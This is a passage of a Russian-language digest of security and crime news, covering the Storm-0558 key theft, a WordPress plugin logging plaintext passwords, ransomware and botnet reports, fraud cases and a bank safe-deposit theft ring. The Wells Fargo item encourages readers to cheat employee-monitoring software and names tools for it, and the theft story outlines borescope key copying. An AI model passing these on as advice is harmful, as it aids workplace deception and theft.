account consumer signing key), который используется для подписания токенов.
Благодаря 0-day проблеме, связанной с валидацией в
GetAccessTokenForResourceAPI, хакеры смогли подделать чужие подписанные токены
Azure Active Directory (Azure AD или AAD) и выдать себя за своих жертв.

При этом в Microsoft до сих пор не объяснили, как именно такой важный ключ MSA
вообще оказался в руках хакеров.
Как теперь заявляют аналитики компании Wiz, специализирующейся на облачной безопасности, проблема затронула все приложения Azure AD, работающие с Microsoft OpenID v2.0. Дело в том, что украденный ключ мог подписать любой токен доступа OpenID v2.0 для личных учетных записей (например, Xbox, Skype) и мультитенантных приложений AAD при определенных условия.
Хотя Microsoft заявляла, что пострадали только Exchange Online и Outlook, по мнению специалистов Wiz, хакеры могли использовать скомпрометированный ключ для выдачи себя за любую учетную запись в любом пострадавшем клиентском или облачном приложении Microsoft. В их число входят managed-приложения Microsoft, такие как Outlook, SharePoint, OneDrive и Teams, а также клиентские приложения, поддерживающие аутентификацию Microsoft Account, включая те, которые позволяют использовать функциональность Login with Microsoft.
«Всё в экосистеме Microsoft использует для доступа токены аутентификации Azure Active Directory, — объясняют исследователи. — Злоумышленник с ключом подписи AAD — это самый сильный злоумышленник, которого только можно представить, поскольку он может получить доступ практически к любому приложению под видом любого пользователя. Это настоящая суперспособность — кибероборотень».
Click to expand...
В ответ на эти обвинения исследователей представители Microsoft вновь подчеркнули, что компания отозвала все ключи MSA, чтобы гарантировать, что злоумышленники не имеют доступа к другим скомпрометированным ключам. И это полностью предотвращает любые попытки создания новых токенов. Также в компании говорят, что многие заявления экспертов Wiz «являются спекулятивными и не основаны на фактах».
Сообщается, что после аннулирования украденного ключа специалисты Microsoft не обнаружили дополнительных доказательств, указывающих на несанкционированный доступ к учетным записям клиентов с использованием того же метода подделки токенов. Кроме того, Microsoft отмечает, что тактика Storm-0558 изменилась, и хакеры более не имеют доступа к каким-либо ключам подписи.
«На данном этапе трудно определить полные масштабы инцидента, поскольку потенциально уязвимыми были миллионы приложений (как приложений Microsoft, так и приложений клиентов), и в большинстве из них отсутствуют необходимые журналы, чтобы определить, были ли они скомпрометированы», — объясняют эксперты Wiz.
Click to expand...
Дело в том, что до этого инцидента возможности ведения журналов были доступны только клиентам Microsoft, которые оплатили соответствующую лицензию Purview Audit (Premium). Из-за этого Microsoft столкнулась с серьезной критикой со стороны ИБ-сообщества, и эксперты заявили, что сама Microsoft мешала организациям оперативно обнаружить атаки Storm-0558.
В результате, под давлением сообщества и Агентства по кибербезопасности и защите инфраструктуры США (CISA), компания [согласилась](http://www.microsoft.com/en- us/security/blog/2023/07/19/expanding-cloud-logging-to-give-customers-deeper- security-visibility/) бесплатно расширить доступ к данным облачных журналов, чтобы защитники могли обнаруживать подобные попытки взлома в будущем.
Разработчики плагина All-In-One Security (AIOS), установленного более чем на миллионе сайтов, [выпустил патч](https://aiosplugin.com/all-in-one-security- aios-wordpress-security-plugin-release-5-2-0/). Дело в том, что недавно пользователи обнаружили, что плагин запоминает пароли в формате простого текста и хранит их в БД, доступной для администраторов сайтов.
Иронично, но AIOS – это защитный плагин, разработанный для предотвращения кибератак, включая попытки брутфорса. Так, плагин предупреждает об использовании имени пользователя администратора по умолчанию для входа в систему, предотвращает атаки ботов, фиксирует активность пользователей и борется со спамом в комментариях.
Ошибку с сохранением паролей около трех недель назад [обнаружили](https://wordpress.org/support/topic/cleartext-passwords-written- to-aiowps_audit_log/page/2/) на форумах WordPress. Тогда пользователь, заметивший странное поведение плагина, выразил обеспокоенность тем, что его из-за этого организация не пройдет предстоящую проверку безопасности сторонними аудиторами. В тот же день представитель AIOS ответил ему, что «это известная ошибка в последнем релизе», а также предоставил скрипт, который должен был удалять сохраненные данные. Пользователь сообщил, что скрипт не работает.
Как выяснилось теперь, AIOS сохранял пароли автоматически, когда пользователи входили в систему, и БД с этими данными была свободно доступна администраторам сайтов. Разработчики объясняют, что это происходило в результате ошибки появившейся в мае текущего года, в версии 5.1.9. Версия 5.2.0, выпущенная на этой неделе, должна была исправить проблему, а также удалить собранные плагином данные.
Представители AIOS подчеркивают, что для эксплуатации этой уязвимости нужно было войти в систему с привилегиями администратора или эквивалентными. То есть багом мог воспользоваться лишь админ-злоумышленник, «который уже мог делать подобные вещи, потому что он — админ».
Стоит отметить, что даже после релиза AIOS 5.2.0 пользователи [жаловались](https://wordpress.org/support/plugin/all-in-one-wp-security-and- firewall/) на то, что обновление «ломает» их сайты, но не удаляет ранее собранные пароли. Для решения этой проблемы был выпущен AIOS версии 5.2.1, но некоторые пользователи все еще утверждают, что их сайты по-прежнему не работают.
К тому же теперь сопровождающих AIOS критикуют ИБ-эксперты, заявляя, что они должны предупредить всех пострадавших пользователей о сохранявшихся паролях, чтобы люди могли сбросить свои учетные данные. Особенно это актуально с тех случаях, когда одни и те же логины и пароли использовались на нескольких сайтах.
Специалисты давно предупреждают, что нельзя хранить пароли в открытом виде, учитывая, что хакеры могут относительно легко взломать сайт и похитить хранящиеся в БД данные. В этом контексте сохранение незашифрованных паролей в любую базу данных — независимо от того, кто имеет к ней доступ — является серьезным нарушением безопасности.
Увеличение ущерба от программы-вымогателя Gwisin
В последнее время увеличивается ущерб от программ-вымогателей Gwisin, нацеленных на корейских компании. AhnLab ASEC сообщила, что эта программа- вымогатель создается и распространяется для конкретных компаний и работает в виде установочного файла MSI, аналогичного Magniber.
Согласно опубликованному контенту, в отличие от Magniber, который распространяется среди неустановленных масс, программы-вымогатели Gwisin проявляют себя не только выполнением одного файла и требуют особого значения фактора выполнения. Эти значения параметров используются в качестве ключевой информации, необходимой для управления файлом DLL, включенным в MSI.
Из-за особенностей этого метода работы в продуктах безопасности в различных изолированных средах его может быть трудно обнаружить, поскольку программы- вымогатели не возникают только путем запуска файлов. Кроме того, внутренний DLL-файл управляется путем его внедрения в обычный процесс Windows, а целевой процесс имеет разные характеристики для каждой компании-жертвы.
Характеристики метода работы программы-вымогателя Gwisin, выявленные на данный момент, следующие.
- Распространяется в виде установочного файла MSI
- Используется для управления внутренней DLL через значение коэффициента,
использованное при выполнении MSI
- Действие программы-вымогателя путем внедрения в системный процесс Windows
- Наличие зараженной информации о компании внутри DLL (отображается в
примечании о выкупе)
Программа-вымогатель Gwisin меняет расширение после шифрования файла, и особенность заключается в том, что расширение носит имя целевой компании.
Записка о выкупе создается в целевой папке шифрования, а имя текстового файла с заметкой о выкупе также включает строку расширения, например «!!!HOW_TO_UNLOCK******FILES!!!.TXT». В записке о выкупе есть список контактов, а также список информации, украденной внутри компании.
Если вы посмотрите на случаи повреждения, вы увидите, что антивирусная программа, использовавшаяся до заражения программой-вымогателем, была отключена.
AhnLab ASEC сообщает что «В продукте V3 необходимо активировать опцию «Использовать диагностику на основе поведения», потому что программа- вымогатель Gwisin этого типа предварительно блокируется на этапе внедрения посредством обнаружения на основе поведения».
Кроме того, «заражение программой-вымогателем Gwisin находится в процессе установки и запуска программы-вымогателя на нескольких системах после предварительного захвата внутренней системы. Если анализ причин не будет выполнен с помощью этих действий после причинения ущерба, он может быть заменен другим вымогателем, и подобный ущерб может произойти снова»
Как стало известно «Ъ», один из руководителей старейшего в стране СИЗО, Бутырской тюрьмы, проверяется Следственным комитетом на причастность к операциям с криптовалютой, которые незаконно осуществлялись в учреждении столичного управления ФСИН. В управлении СКР по Тверскому району проводится проверка на предмет возможного превышения должностных полномочий (ст. 286 УК РФ) одного из заместителей начальника СИЗО-2, больше известного как «Бутырка» (тюрьма построена еще в 1771 году).
По данным оперативных служб, офицер совместно с неустановленными следствием лицами в ноябре 2021 года установил в филиале психиатрической больницы ФСИН, расположенном в «Бутырке», аппаратуру для майнинга криптовалюты, которая работала до февраля нынешнего года. На это было потрачено 8379,45 кВт электроэнергии общей стоимостью 62 175 руб. 52 коп.
Таким образом, офицер мог совершить «действия, явно выходящие за пределы его полномочий, чем существенно нарушил охраняемые законом интересы общества или государства», подозревает следствие.
source: kommersant.ru/doc/5357906
Все указывает на то, что компания стала жертвой вымогательского ПО.
Электроэнергетическая компания штата Колорадо Delta-Montrose Electric Association (DMEA) болезненно восстанавливается после разрушительной кибератаки, в результате которой были уничтожены все ее данные за последние 25 лет. Из-за атаки, имевшей место в прошлом месяце, компании пришлось отключить 90% своих внутренних компьютерных систем.
В новом [уведомлении](https://www.dmea.com/network- updates?utm_source=Press+Contacts&utm_campaign=8fdd490926-EMAIL_CAMPAIGN_2018_05_14_COPY_01&utm_medium=email&utm_term=0_c938e51913-8fdd490926-427303105) , опубликованном DMEA для клиентов на этой неделе, сообщается, что компания начнет принимать платежи через платформу SmartHub и другие платежные терминалы до 6 декабря. 6-10 декабря компания надеется восстановить биллинг, поэтому клиентам следует ожидать наплыва счетов за электроэнергию. При этом DMEA отметила, что не будет отключать услуги за неуплату и не налагать штрафы до 31 января 2022 года.
Сотрудники компании стали замечать неладное 7 ноября, а через некоторое время почти вся компьютерная сеть DMEA была отключена. Атака затронула все системы поддержки, инструменты обработки платежей, платформы биллинга и другие предоставляемые клиентам инструменты. Как сообщили в компании, хакеры атаковали определенные сегменты внутренней сети и повредили документы, таблицы и формы, что указывает на атаку вымогательского ПО.
Инцидент также затронул телефонные системы и электронную почту, но электростанции и волоконно-оптическая сеть не пострадали. Персональные данные клиентов или сотрудников DMEA скомпрометированы не были.
DMEA наняла ИБ-экспертов для расследования инцидента, но все еще испытывает трудности с восстановлением сети.
«В настоящее время мы работаем с ограниченной функциональностью и сосредоточены на завершении расследования и восстановлении сервисов как можно более эффективно, экономично и безопасно. Мы стремимся восстановить нашу сеть и вернуться к нормальной работе, но это займет время и требует поэтапного подхода», - сообщила компания.
Подробнее: https://www.securitylab.ru/news/527182.php
Ботнет Arcbot атакует инфраструктуру китайских провайдеров облачного хостинга, [предупредили](https://www.cadosecurity.com/the-continued-evolution-of- abcbot/) исследователи из компании Cado Security. Предположительно, основной целью малвари является майнинг криптовалюты.
Abcbot атакует серверы таких компаний, как Alibaba Cloud, Baidu, Tencemt и Huawei Cloud, говорят эксперты, тем самым подтверждая выводы своих коллег из [Trend Micro](https://www.trendmicro.com/zh_hk/research/21/j/actors-target- huawei-cloud-using-upgraded-linux-malware-.html) и Qihoo 360 NetLab.
«У меня есть теория, что более молодые провайдеры облачных услуг, такие как Huawei Cloud, Tencent и Baidu, не так развиты, как AWS, где есть автоматические оповещения на случай, когда развертывание осуществляется небезопасным образом, — [рассказал](https://therecord.media/new-abcbot-botnet- goes-after-chinese-cloud-providers) изданию The Record Мэтт Мьюир из Cado Security. — Облако Alibaba определенно существует дольше, поэтому службы безопасности компании тоже выглядят более зрелыми. Примечательно, что компания Trend Micro обнаружила малварь, нацеленную на Huawei Cloud, а новые образцы, которые проанализировали мы, уже нацелены и на других китайских поставщиков облачных услуг».
Атаки Abcbot, как правило, нацелены на серверы Linux, которые защищены слабыми паролями или работают с незащищенными приложениями. Как только точка входа найдена, Abcbot развертывает скрипт Linux bash, который отключает защиту SELinux, создает бэкдор для для операторов малвари, а затем сканирует зараженные системы на наличие другой малвари.
Обнаружив конкурирующее вредоносное ПО, Abcbot ликвидирует его процессы, а также любые другие процессы, которые могут быть связаны с майнингом криптовалюты. Затем Abcbot совершает еще одно действие, нехарактерное для других ботнетов: удаляет ключи SSH, оставляя только свои собственные, чтобы гарантировать, что его операторы — единственные, кто сможет подключиться к серверу.
Мьюир говорит, что подобное поведение предполагает, что другие хак-группы тоже используют аналогичную технику, которую разработчики Abcbot подхватили и решили помешать конкурентам. Впрочем, возможно, что хакеры также просто удаляют свои собственные ключи от предыдущих кампаний.
Интересно, что образцы Abcbot, изученные Cado Security, могли лишь заражать новые системы, делая их частью ботнета. При этом старые образцы, проанализированные Trend Micro, имели модули для добычи криптовалюты, а образцы, изученные Qihoo 360 NetLab, могли использоваться для организации DDoS-атак. Однако с учетом того, что вредонос уничтожает на зараженных машинах любых процессы, связанные с майнингом, эксперты считают, что его конечная цель — это все же добыча криптовалюты.
По сообщению Министерства юстиции США, в понедельник двух нигерийских мошенников приговорили к лишению свободы, суммарный срок заключения составил более 22 лет. Осужденные состояли в глобальной сети, которая взламывает корпоративную электронную почту, чтобы обманом заставить сотрудников перечислить им деньги компании.
Для борьбы со схемами компрометации корпоративной электронной почты (Business Email Compromise, BEC) федеральные власти провели масштабную операцию Operation reWired. По ее итогам на сегодняшний день арестовано более 280 человек. Среди них оказались 46-летний Опейеми Абидеми Адеосо и его 47-летний сообщник Бенджамин Аделеке Ифебаджо, которых осудили за электронное мошенничество и отмывание денег.
При BEC-атаке, также известной как «атака посредника», злоумышленник похищает идентифицирующие данные и выдает себя за знакомого жертвы, убеждая ее перевести средства на счет, который считается надежным, хотя на самом деле его контролирует мошенник.
В большинстве случаев мошенники связываются с теми, у кого есть доступ к финансам компании.
Федеральные агенты начали расследование в отношении Адеоcо и Ифебаджо в августе 2018 года: властям сообщили о BEC-атаке, после которой на банковский счет, зарегистрированный на имя Дэниела Сэмми Кэмпбелла, перевели 504 тысячи долларов.
Адрес, связанный со счетом, вывел правоохранителей на Адеоcо. А Ифебаджо опознали на видеозаписях с камер наблюдения в банке, куда он пришел, чтобы снять незаконно полученные деньги.
«Обвиняемые [Адеосо и Ифебаджо] использовали череду приемов, чтобы присвоить деньги предприятий, где никто ничего не подозревал», — сказал глава далласского отделения ФБР Мэттью Дж. ДеСарно.
Осужденные работали вместе с другими участниками глобальной сети. Преступники отправляли ничего не подозревающим жертвам фишинговые письма, выдавали себя за их работодателей, руководителей и деловых партнеров, а затем уговаривали их перевести средства с их личных счетов и счетов работодателя.
Потом они снимали деньги различными способами — по несколько десятков тысяч долларов за раз — и вносили средства на свои счета.
По данным Минюста, обманывая жертв, Адеосо и Ифебаджо использовали не менее 12 псевдонимов.
BEC-атаки помогают не только выманить у жертвы деньги, но и получить конфиденциальные данные: банковские и налоговые документы, номер социального страхования или любую другую личную информацию.
В июне 2020 года Адеосо признал вину по 30 с лишним пунктам обвинения в электронном мошенничестве, отмывании денег и использовании поддельного паспорта. Его приговорили к 151 месяцу лишения свободы и обязали выплатить 9,3 миллиона долларов в качестве компенсации.
А в марте того же года Ифебаджо признал себя виновным по 19 пунктам обвинения в тех же преступлениях. Он проведет в тюрьме 120 месяцев и заплатит 2,1 миллиона долларов в качестве компенсации.
В рамках глобального расследования в США уже арестовали не менее 74 человек; подозреваемых задержали также во Франции, Италии, Великобритании, Японии, Кении и Малайзии.
• Source: justice[.]gov/usao-ndtx/pr/nigerian-email-scammers-sentenced- combined-22-years-federal-prison
По информации Bleeping Computer, в мае этого года уволенный сотрудник кредитного союза Нью-Йорка в отместку удалила более 21 ГБ данных клиентов и смогла некоторое время просматривать отчетные документы компании. Причем она это сделала спустя двое суток после окончания официальной процедуры оформления документов о завершении работы в компании. Это произошло по вине техподдержки, которая не удалила ее учетную запись из системы после получения тикета о необходимости удаления доступа для уволенного сотрудника.
Согласно документам суда, бывшая сотрудница кредитного союза Нью-Йорка Джулиана Бариле признала себя виновной в несанкционированном доступе к компьютерным системам финансового учреждения и уничтожении в отместку после увольнения более 21 ГБ данных, включая тысячи заявок клиентов на ипотечную ссуду и другую конфиденциальную информацию, хранящуюся на файловом сервере компании.
Бариле уволили 19 мая 2021 года, причем она работала в кредитном союзе Нью- Йорка по совместительству, то есть не на полную ставку. В процессе ее увольнения служащий отдела кадров кредитного союза обратился в службу поддержки компании с просьбой отключить учетные данные Бариле для блокировки возможности удаленного доступа, но по факту этого не было сделано. Двумя днями позже, 21 мая, Бариле умышленно зашла под своим аккаунтом и провела внутри сети компании примерно 40 минут.
Экспертиза показала, что за это время она стерла более 20 тыс. файлов и удалила 3,5 тыс. папок с доступного ей сетевого ресурса. В общей сложности ее действия привели к пропаже с общих серверных ресурсов организации около 21,3 ГБ данных.
Помимо удаления документов с данными клиентов и файлов компаний-партнеров кредитного союза Бариле также открывала и просматривала различные конфиденциальные документы компании, включая файлы, содержащие протоколы заседаний руководства кредитного союза.
Пять дней спустя Бариле призналась подруге в электронной переписке, что ей удалось «уничтожить» тысячи документов на серверах своего бывшего работодателя из-за того, что они не отозвали ее доступ к общим сетевым документам.
Инцидент получил широкую огласку в США и им даже заинтересовалось ФБР. Оказалось, что, хотя у кредитного союза Нью-Йорка были резервные копии некоторых данных, удаленных Бариле, компания не смогла восстановить все файлы оперативно. Кредитному союзу даже пришлось воспользоваться услугами третьих лиц и потратить более $10 тыс. долларов на восстановление уничтоженных данных с дисков после несанкционированного вторжения Бариле. Компания не уточнила, смогла ли она вернут все данные и как быстро была обнаружена проблема с их удалением.
Представитель ФБР в ходе расследования уточнил, что Бариле своими действиями не только нанесла ущерб бывшему работодателю, но и причинила достаточный вред клиентам, данные которых зависли в системы кредитного союза без обработки, а они сами оказались в затруднительном положении из-за их удаления. Он также напомнил, что внутренняя угроза может нанести такой же ущерб, если не больше, чем проникший извне злоумышленник.
• Source: justice[.]gov/usao-edny/press-release/file/1428871/download
Требования аналогичные тем, что компания Apple реализовала в своём магазине App Store.
После вступления в силу новой политики Google в описании приложений появится дополнительный раздел с информацией о том, к каким данным имеет доступ продукт. У разработчиков будет возможность рассказать пользователям о том, для чего приложению нужен доступ к тем или иным данным и как их обработка влияет на общую функциональность.
Например, приложения будут предоставлять информацию о том, шифруются ли данные, имеют ли к ним доступ третьи лица и могут ли пользователи запросить удаление этой информации из базы разработчика.
До вступления в силу новых правил пройдёт ещё несколько месяцев, поскольку Google намерена предоставить разработчикам достаточно времени для внесения соответствующих изменений. Согласно имеющимся данным, разработчики смогут добавлять информацию о конфиденциальности приложений с четвёртого квартала этого года, а пользователям эти данные начнут демонстрироваться с первого квартала следующего года.
Wells Fargo массово уволила сотрудников, которые установили на свои ПК программы для имитации работы. Софт обманывал программы для слежки за работниками – он подделывал движения курсора мыши и нажатия на клавиатуру. Руководство не оценило хитрость работников по достоинству и отправило их искать другую работу.
Излишняя находчивости приводит к проблемам
Более 12 сотрудников компании Wells Fargo остались без работы. Они имитировали бурную деятельность на рабочем месте, установив на свои ПК софт для симуляции работы мышки и клавиатуры, а сами тратили рабочее время по своему усмотрению. Как пишет Tom’s Hardware, работодатель остался не в восторге от их действий и исключил их из кадрового состава.
Wells Fargo – это один из старейших гигантов американской финансовой системы. Банковская компания основана в 1852 г. и в настоящее время, входит в число крупнейших банков США. Она оказывает финансовые и страховые услуги не только в этой стране, но также в Пуэрто-Рико и Канаде. За более чем 170 лет существования она вошла в топ-10 самых дорогих компаний США.
На рабочих ПК сотрудников Wells Fargo установлено специализированное ПО, которое буквально следит за сотрудниками, определяя, есть ли он на месте, и занят ли он работой. Многие руководители пытались заставить своих подчиненных установить такой софт даже на домашние ПК, когда весь мир ушел на удаленную работу, но эта практика не прижилась – многие работники заявили, что не будут ставить никакой лишний софт на личные компьютеры, которые фирма им не покупала.
Уволенные сотрудники Wells Fargo не могли удалить софт для слежки с рабочих ПК, поэтому они решили обмануть его при помощи специального ПО для имитации работы за компьютером. Их быстро вычислили и попросили на выход.
Неэтичность – не наш выбор
Wells Fargo официально подтвердила информацию об увольнении чрезмерно находчивых сотрудников, но точное их количество не назвала. Ее представители заявили агентству Bloomberg, что компания не собирается терпеть неэтичное поведение сотрудников (does not tolerate unethical behavior), и что от тех, кто числится в ее штата, она требует соблюдения самых высоких стандартов поведения (holds employees to the highest standards).
К моменту выхода материала не было информации, какие еще последствия могут ждать теперь уже бывших работников Wells Fargo, решивших побороться с компанией. Но попробовать провернуть аналогичный фокус со своим работодателем, отслеживающим деятельность сотрудников при помощи специализированного ПО, может каждый.
Tom’s Hardware пишет, что софт, имитирующий движение мышки и работу клавиатуры, можно без особого труда найти в интернете. Инструкции по их применению есть в самых разных соцсетях и сообществах.
Там же можно найти и аппаратные решения проблемы нежелания без перерыва по восемь часов в день и более сидеть за компьютером. Они пригодятся тем, чьи работодатели запрещают устанавливать на рабочие ПК стороннее программное обеспечение.
Подобные гаджеты имеются в свободной продаже и стоят сравнительно недорого – например, на Amazon их можно найти приблизительно за $20. Также в Сети есть множество инструкций по самостоятельной сборке подобных гаджетов – например, их часто делают на базе супердешевого одноплатного компьютера Raspberry Pi Pico, стоимость которого к моменту выхода материала начиналась от $4.
Более безопасный способ
Существует еще один способ выкроить себе немного свободного времени в разгар рабочего дня, при этом не используя ни сторонний софт, ни самодельное или купленное «железо». CNews писал, что для этого потребуется лишь доступ в интернет.
В Сети существует сайт White Screen, позволяющий выводить на экран имитацию окна обновления операционной системы. Этот процесс, как известно, часто проходит очень медленно – в настройках сайта можно указать, как быстро будет идти поддельная установка обновлений, то есть сколько свободного времени появится у пользователя ПК.
Притом поддерживаются не только современные операционные системы, но и совсем уж древние, например, 23-летняя Windows XP. На случай, если руководство не поверит в такой фокус с обновлением, можно вывести на дисплей окно «синего экрана смерти» при помощи того же сервиса.
В Омске раскрыли преступную группу, члены которой обманом похитили у «Газпромбанка» и ВТБ более 150 миллионов рублей. Они использовали сотрудников банка, чтобы провернуть схему с кредитами.
Схема работала просто. Выглядело всё примерно так: члены преступного сообщества создали несколько номинальных организаций, куда фиктивно устраивали неких работников. Потом эти «сотрудники» обращались в банки, чтобы заключить кредитный договор. И тут начинала работать самая важная часть схемы.
По версии следствия, среди членов группы было две сотрудницы банков: одна работала в «Газпромбанке», другая — в омском филиале ВТБ. Они и помогали вносить заведомо ложные данные для оценки платёжеспособности клиента. В итоге фиктивные работники получали кредиты и не выплачивали их.
Следователи считают, что с начала 2019 года преступники смогли заработать 159 миллионов рублей. Группа преимущественно состояла из женщин. Двух из них — 40-летнюю Юлию Светлову и 37-летнюю Алёну Жданову — следствие считает организаторами преступного сообщества. Кроме них в ПС входили ещё семь человек (двое мужчин и пять женщин). По информации источников «Базы», 14 сентября на подозреваемых было возбуждено уголовное дело по статье об организации преступного сообщества. Юлию Светлову ждёт арест, других подозреваемых — подписка о невыезде.
В ВТБ сообщили «Базе», что служба безопасности банка выявила эту схему в 2021 году, инициировав уголовные разбирательства. Банк продолжает сотрудничество со следствием.
В соцсети уверены, что бизнесмен нарушал условия сделки и раскрывал конфиденциальную информацию.
Twitter просит судью штата Делавэр обязать Илона Маска показать на суде всю личную переписку с его смартфона за период с 1 января по 8 июля 2022 года. Об этом сообщает Bloomberg.
В соцсети уверены, что миллиардер скрывает доказательства своего недобросовестного поведения в рамках сделки о покупке компании за $44 млрд.
Кроме того, адвокаты Twitter попросили суд привлечь к тем же судебным санкциям главного помощника Илона Маска Джареда Бирчалла, который, по мнению компании, также участвовал в покупке социальной сети.
source: bloomberg.com/news/articles/2022-09-02/twitter-asks-for-musk-to-turn- over-six-months-of-2022-texts
В 2020 году 32-летний Лукас вел группу в Facebook (запрещенная в РФ соцсеть), где рекламировал покерный сайт, который был незаконным в штате Миннесота. В марте этого же года один из агентов по борьбе с азартными играми штата Миннесоты вступил в паблик, но не с целью заработать, ведь зарплаты в Америке у копов и так высокие, а чтобы следить за работягами.
Собрав нужные доказательства, агент 007 (0 палева, 0 лидов у Лукаса ближайшие 7 лет) смог получить ордер на изъятие денюшек со счетов PayPal и Venmo, а также на экспертизу смартфона. Записи разговоров подтвердили, что мужчина был связан с азартными играми.
В мае 2022 года мужчине предъявили обвинение в получении дохода от деятельности нелегального онлайн-заведения.
Это первый случай, когда арбитражника судят за продвижение нелегальных казино и такое, возможно, повторится. Дело в том, что на федеральном уровне нет четкого предписания, как поступать с подобного рода рекламой из-за того, что закон UIEGA 2006 (Unlawful Internet Gambling Enforcement Act) трактуется в каждом штате по-своему.
Но до этого уже привлекали к уголовной ответственности арбитражников, которые лили схемный трафик, так как это считается мошенничеством в любой стране — даже там, где легалайз гемблы.
В Киеве суд приговорил к 11 годам тюрьмы Максима Бисерова — члена банды, которая в 2015-2016 годах успешно реализовала серию краж в отделениях банков, похищая из индивидуальных ячеек наличность и драгоценности. Об этом редакция 368.media узнала из приговора Дарницкого райсуда по ч. 4 ст. 28, ч.5 ст. 185, ч.3 ст. 358, ч.4 ст. 358 УК.
Следователи доказали, что с участием Бисерова произошли кражи в семи банках. Суд признал гражданские иски потерпевших к этому мужчине на сумму более 70 млн гривен.
Как выяснили правоохранители, лидерами преступной организации являются двое выходцев из Украины, которые получили американское гражданство и неоднократно меняли имена. Это Вел Купер (Вел Конон) или Валерий Кононенко. Второй соучастник – Гарри Смит (Игорь Берк) или Игорь Беркович. Третий их сообщник – уроженец Беларуси Алекс Левин. К участию в организации было привлечено около 25 человек. Расследованием преступлений занимались правоохранители всех пострадавших стран, а также США и Европол.
Злоумышленники прежде всего пользовались следующими недостатками систем безопасности самих банков:
Чтобы проникнуть в хранилище и провести разведку, соучастники преступления снимали банковские ящики с использованием подлинных или поддельных документов. Так они могли посещать отделение несколько раз. Оставаясь наедине у банковских ящиков, злоумышленник использовал бороскоп для съемки внутренней части замка сейфа. Далее они изготавливали дубликат ключа. В следующий визит они проверяли возможность вскрыть копией ячейку, а после переходили к завершающему этапу.
Лидеры организации в 2015 году прилетели из Нью-Йорка в Киев, чтобы лично принять участие в воровстве. Американец зашел в отделение банка под видом клиента, пока его напарник Купер (Кононенко) ждал в машине неподалеку. Когда шеф с полным чемоданом покидал помещение банка, Бисеров заходил якобы как клиент, которому понадобилось проверить свой ящик. Так он отвлекал сотрудников банка и прикрывал своего руководителя, чтобы кражу не заметили слишком быстро.
В другой раз деньги в чемодане из банка уже выносил сам Бисеров, тогда как его подстраховывал сообщник. Иногда наличных денег и драгоценностей было так много, что в хранилище, чтобы вынести все, заходило два человека. Утром 14 июля 2016 года в период с 9 до 12 часов злоумышленники последовательно ограбили в Киеве четыре отделения банков. Ни разу их не ловили с поличным. По данным правоохранителей, участниками этой преступной организации похищено имущество 51 физического лица из индивидуальных сейфов 10 банковских учреждений в городе Киеве на сумму 169 млн гривен.
После этого летом 2017 злоумышленники начали подготовку к воровству из отделения «ПриватБанка» в столице Латвии — Риге. В результате в январе 2018 года из латвийского банка похищены средства и ценности в эквиваленте 60,3 млн гривен. Кроме того, готовилось аналогичное похищение имущества из банковских сейфов на территории Грузии; на территории Республики Узбекистан и территории Азербайджанской Республики в период февраль-октябрь 2018 года. Подобные преступления участниками группировки вроде бы совершены на территории Российской Федерации, Республики Молдова, Республики Беларусь, Республики Македония.
Первый обвинительный приговор в Украине касается одного из исполнителей. Известно, что Бисеров проживал в оккупированном Донецке и в мае 2015 года выехал в Киев на встречу с прилетевшим из Нью-Йорка работодателем. Считается, что Бисеров работал телохранителем и водителем американца украинского происхождения, но очень скоро был привлечен к воровству из банков. Внимание стражей порядка привлекло то, что мужчина одновременно арендовал много сейфов и именно в тех ограбленных банках. Также было зафиксировано, что он посещал эти банки в дни ограбления. Его сняли камеры видеонаблюдения и опознали работники банков.
Бисерова задержали в феврале 2019 года в Волновахе, после чего доставили в Киев и поместили в «Киевский следственный изолятор». Первоначально он полностью признавал свою вину, разоблачал преступные действия участников и организаторов преступной организации. Через три дня после задержания подозреваемый опознал по фотоснимкам одного из предводителей преступной организации, который предложил ему участвовать в кражах. Узнал так называемого бизнес-партнера шефа и лицо, производившее заготовки и дубликаты ключей к сейфам. Но очень скоро он передумал и уже с марта причастность к этим преступлениям отрицал. В суде Бисеров признал вину только в том, что арендовал ячейки по поддельному паспорту. Делал так, потому что работники банков отказывали ему в аренде из-за донецкой регистрации.
Однако аренда ячеек одновременно в разных банках противоречит собственной же версии обвиняемого, что все банки ему отказывали. Заключение договоров аренды ящиков и время посещения банковских учреждений совпадают с обстоятельствами краж в эти дни. Кроме того, суд учитывает, что в ходе следственных действий подозреваемый лично добровольно узнавал своих соучастников и рассказывал об обстоятельствах совместного совершения преступлений. В итоге вора приговорили к 11 годам заключения.
Что касается руководства банды, то еще в прошлом году федеральный суд Бруклина (США) обнародовал обвинительное заключение в отношении Вела Купера, Алекса Левина и Гарри Смита, которые обвиняются в сговоре с целью отмывания денег в схеме похищения 30 млн долларов наличными и других ценностей из банковских сейфов за рубежом. Следствие считает, что злоумышленники выбирали банки, в которых не хватало средств безопасности, в том числе камер видеонаблюдения в определенных зонах. После того как банк был выбран, они арендовали сейфы, выдавая себя за клиентов. Купер считается лидером сети, он руководил другими, получал украденное имущество и пользовался своими банковскими счетами в США для отмывания доходов. Левин использовал банковские счета для приобретения оборудования для съемки и воровства, а также для отмывания доходов.
Правоохранители провели обыск резиденции Купера, где обнаружили, среди прочего, ключи от сейфа без нумерации, наличные деньги, ювелирные изделия и элитные сумки. Также обыскали хранилище в Бруклине, контролируемое Купером, и нашли бороскоп и замок от сейфа. Кононенко (Купер) — уроженец села Старая Синява Хмельницкой области, раньше имел проблемы с законом. В 1986 году в СССР осуждался за кражу и впоследствии в России в 2001 задерживался за какое-то другое преступление. Такую информацию адвокат Купера сам передал американскому суду.
Этот мужчина сменил свое имя с Валерия Кононенко на Вела Конона в 2006 году, когда получил американское гражданство. В 2016-м он переименовался в «Вела Купера», якобы во избежание разоблачения. Жена мистер Купера и две дочери также гражданки США. Одна из дочерей уже врач, а другая учится на стоматолога.
Левина еще в апреле 2021 года отпустили под домашний арест с залогом в 500 тыс.ч долларов. За Левина своим имуществом поручилась девушка, с которой тот поддерживает долгие отношения. Залог по-американски означает, что в случае бегства суд взимает с поручителя определенную ранее сумму залога.
3 февраля 2022 года Вел Купер заявил, что признает вину. Он согласился на конфискацию 4 млн долларов, а также следующие активы: двух квартир в Нью-Йорке на Кент Авеню и связанных с ними доходов, а также около 250 тыс. долларов, изъятых с банковских счетов его жены Нинель Кононенко, которая знала о решении мужчины и также дала согласие на конфискацию. Суд освобождает от конфискации 129 тыс. долларов — остаток с банковских счетов жены и 115 ювелирных изделий, изъятых из квартиры на Кент Авеню, 429. Из этих уволенных активов будут оплачены услуги адвоката.
